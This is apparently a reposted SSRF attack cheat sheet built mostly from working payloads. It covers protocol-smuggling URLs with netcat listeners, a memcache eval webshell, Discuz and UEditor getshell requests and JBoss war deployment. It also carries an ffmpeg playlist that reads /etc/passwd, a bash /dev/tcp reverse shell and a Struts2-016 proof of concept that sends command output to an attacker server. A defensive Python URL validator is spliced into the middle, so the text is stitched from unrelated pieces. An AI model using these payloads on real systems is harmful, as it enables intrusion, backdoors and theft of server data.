SSRF PHP functions (common sinks)
file_get_contents(), fsockopen(), curl_exec()
SFTP
http://0cx.cc/ssrf.php?url=sftp://evil.com:11111/
evil.com:$ nc -v -l 11111
Connection from [192.168.0.10] port 11111 [tcp/*] accepted (family 2, sport 36136)
SSH-2.0-libssh2_1.4.2
Dict
http://0cx.cc/ssrf.php?dict://attacker:11111/
evil.com:$ nc -v -l 11111
Connection from [192.168.0.10] port 11111 [tcp/*] accepted (family 2, sport 36136)
CLIENT libcurl 7.40.0
gopher
// http://0cx.cc/ssrf.php?url=http://evil.com/gopher.php
evil.com:# nc -v -l 12346
Listening on [0.0.0.0] (family 0, port 12346)
Connection from [192.168.0.10] port 12346 [tcp/*] accepted (family 2, sport 49398)
HI
Multiline test
TFTP
http://0cx.cc/ssrf.php?url=tftp://evil.com:12346/TESTUDPPACKET
evil.com:# nc -v -u -l 12346
Listening on [0.0.0.0] (family 0, port 12346)
TESTUDPPACKEToctettsize0blksize512timeout6
file
http://0cx.cc/redirect.php?url=file:///etc/passwd
ldap
http://0cx.cc/redirect.php?url=ldap://localhost:11211/%0astats%0aquit
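The defensive counterpart to the scheme list above: a URL check that a fetch endpoint such as ssrf.php or redirect.php should run before handing a user-supplied URL to file_get_contents()/curl_exec(). This is an added example, not code from the original post; the function names, the injectable `resolver` and the constructed lookup table are mine. It refuses every non-http(s) scheme, URLs carrying credentials, ports outside a small allowlist (so 11211 for memcached is rejected), and hosts that resolve to loopback, private or link-local addresses, and it re-checks every hop of a redirect chain rather than only the first URL.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

# Only web schemes may leave the server; sftp/dict/gopher/tftp/file/ldap are refused.
ALLOWED_SCHEMES = {"http", "https"}
ALLOWED_PORTS = {80, 443}  # memcached (11211) and admin ports (8080 etc.) are refused


def resolve_all(host):
    """Every address the host resolves to (real resolver via getaddrinfo)."""
    return {info[4][0] for info in socket.getaddrinfo(host, None)}


def is_public_ip(ip_text):
    """False for loopback, RFC1918, link-local, multicast, reserved and unspecified."""
    ip = ipaddress.ip_address(ip_text)
    return not (ip.is_private or ip.is_loopback or ip.is_link_local
                or ip.is_multicast or ip.is_reserved or ip.is_unspecified)


def check_outbound_url(url, resolver=resolve_all):
    """Return (ok, reason). `resolver` is injectable so the check runs offline in tests."""
    parts = urlsplit(url)
    scheme = parts.scheme.lower()
    if scheme not in ALLOWED_SCHEMES:
        return False, f"scheme {parts.scheme!r} not allowed"
    if not parts.hostname:
        return False, "missing host"
    if parts.username or parts.password:
        return False, "credentials in URL"
    try:
        port = parts.port or (443 if scheme == "https" else 80)
    except ValueError:
        return False, "malformed port"
    if port not in ALLOWED_PORTS:
        return False, f"port {port} not allowed"
    try:
        addrs = resolver(parts.hostname)
    except (socket.gaierror, KeyError, ValueError):
        return False, "host does not resolve"
    # Check every address, not just the first: a dual-answer record must not slip through.
    for addr in addrs:
        if not is_public_ip(addr):
            return False, f"{parts.hostname} resolves to non-public {addr}"
    return True, "ok"


def check_redirect_chain(urls, resolver=resolve_all):
    """Validate each hop of a redirect chain (Location targets) with the same rule."""
    for hop in urls:
        ok, reason = check_outbound_url(hop, resolver)
        if not ok:
            return False, reason
    return True, "ok"
```

In production the resolver result must also be the address actually connected to (resolve once, connect to that IP), otherwise a second DNS lookup inside the HTTP client can return a different answer.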
PHP-FPM universal SSRF bypass safe_mode/disabled_functions/o exploit

SSRF memcache Getshell
Generate serialize
<?php
// The array start is truncated on the page; reconstructed from the serialized output below.
$code = array('global_start' => '@eval($_REQUEST[\'eval\']);');
echo serialize($code)."\n".strlen(serialize($code));

Output
a:1:{s:12:"global_start";s:25:"@eval($_REQUEST['eval']);";}  // serialized data
59  // string length
webshell.php

back.php
open the website
http://bbs.0cx.cc/forum.php?mod=ajax&action=downremoteimg&message=[img]http://myvps/webshell.php?logo.jpg[/img]
http://bbs.0cx.cc/forum.php?mod=ajax&inajax=yes&action=getthreadtypes
clear data
http://bbs.0cx.cc/forum.php?mod=ajax&action=downremoteimg&message=[img]http://myserver/back.php?logo.jpg[/img]
backdoor url
http://bbs.0cx.cc/data/cache/hello.php
Generate serialize

Output
a:2:{s:6:"output";a:1:{s:4:"preg";a:2:{s:6:"search";a:1:{s:7:"plugins";s:5:"/.*/e";}s:7:"replace";a:1:{s:7:"plugins";s:19:"@eval($_POST["c"]);";}}}s:13:"rewritestatus";i:1;}  // serialized data
173  // string length
Open website
http://192.168.80.116/forum.php?mod=ajax&action=downremoteimg&message=[img=1,1]http://you-vps-ip/ssrf.php?.jpg[/img]&formhash=818c8f44
Backdoor website
http://192.168.80.116/forum.php?mod=ajax&inajax=yes&action=getthreadtypes
cat test.jpg
#EXTM3U
#EXT-X-MEDIA-SEQUENCE:0
#EXTINF:10.0,
concat:http://example.org/header.m3u8|file:///etc/passwd
#EXT-X-ENDLIST
subfile
#EXTM3U
#EXT-X-MEDIA-SEQUENCE:0
#EXTINF:10.0,
concat:http://localhost/header.m3u8|subfile,,start,0,end,64,,:///etc/passwd
concat:http://localhost/header.m3u8|subfile,,start,64,end,128,,:///etc/passwd
concat:http://localhost/header.m3u8|subfile,,start,128,end,256,,:///etc/passwd
concat:http://localhost/header.m3u8|subfile,,start,256,end,512,,:///etc/passwd
#EXT-X-ENDLIST
Exploit (PostgreSQL dblink)
> SELECT dblink_send_query('host=127.0.0.1 dbname=quit user=\'\nstats\n\?' password=1 port=11211 sslmode=disable','select version();');
Exploit (MongoDB copyDatabase)
> db.copyDatabase("\1\2\3\4\5\6\7",'test','localhost:8000')
> nc -l 8000 | hexdump -C
> db.copyDatabase("\nstats\nquit",'test','localhost:11211')
exploit (CouchDB)
http://localhost:5984/_users/_all_docs

HTTP/1.1 200 OK
Server: CouchDB/1.2.0 (Erlang OTP/R15B01)
ETag: "BD1WV12007V05JTG4X6YHIHCA"
Date: Tue, 18 Dec 2012 21:39:59 GMT
Content-Type: text/plain; charset=utf-8
Cache-Control: must-revalidate

{"total_rows":1,"offset":0,"rows":[
{"id":"_design/_auth","key":"_design/_auth","value":{"rev":"1-a8cfb993654bcc635f126724d39eb930"}}
]}

An attacker could also make the CouchDB server send requests into the intranet by using the replication function:
POST http://couchdb:5984/_replicate
Content-Type: application/json
Accept: application/json

{
  "source" : "recipes",
  "target" : "http://ssrf-me:11211/recipes"
}
JBoss POC
/jmx-console/HtmlAdaptor?action=invokeOp&name=jboss.system:service=MainDeployer&methodIndex=17&arg0=http://our_public_internet_server/utils/cmd.war
Write shell
http://target.com/ueditor/jsp/getRemoteImage.jsp
POST: upfile=http://10.0.0.1:8080/jmx-console/HtmlAdaptor?action=invokeOp%26name=jboss.system%3Aservice%3DMainDeployer%26methodIndex=3%26arg0=http%3A%2F%2F<remote-address>%2Fhtml5.war%23.jpg

http://target.com/ueditor/jsp/getRemoteImage.jsp
POST: upfile=http://<intranet-ip>:8080/html5/023.jsp%23.jpg
reverse shell
bash -i >& /dev/tcp/123.45.67.89/9999 0>&1
gopher.php
vuln website
https://example.com/uddiexplorer/SearchPublicRegistries.jsp
POST: operator=http://vps-ip/gopher.php&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search
vps
> nc -lvv 2333
Connection from xx.xx.xx.xx port 2333 [tcp/snapp] accepted

http://www.xxx.com/redirect.php?url=file:///etc/passwd
http://www.xxx.com/redirect.php?url=file:///C:/Windows/win.ini
Struts2-016 POC
?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'command'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23t%3d%23d.readLine(),%23u%3d"http://SERVER/result%3d".concat(%23t),%23http%3dnew%20java.net.URL(%23u).openConnection(),%23http.setRequestMethod("GET"),%23http.connect(),%23http.getInputStream()}
// Replace SERVER with your VPS address; the result shows up in its access.log
Related tools: SSRF_Proxy, ssrfsocks

Source: http://blog.safebuff.com/2016/07/03/SSRF-Tips/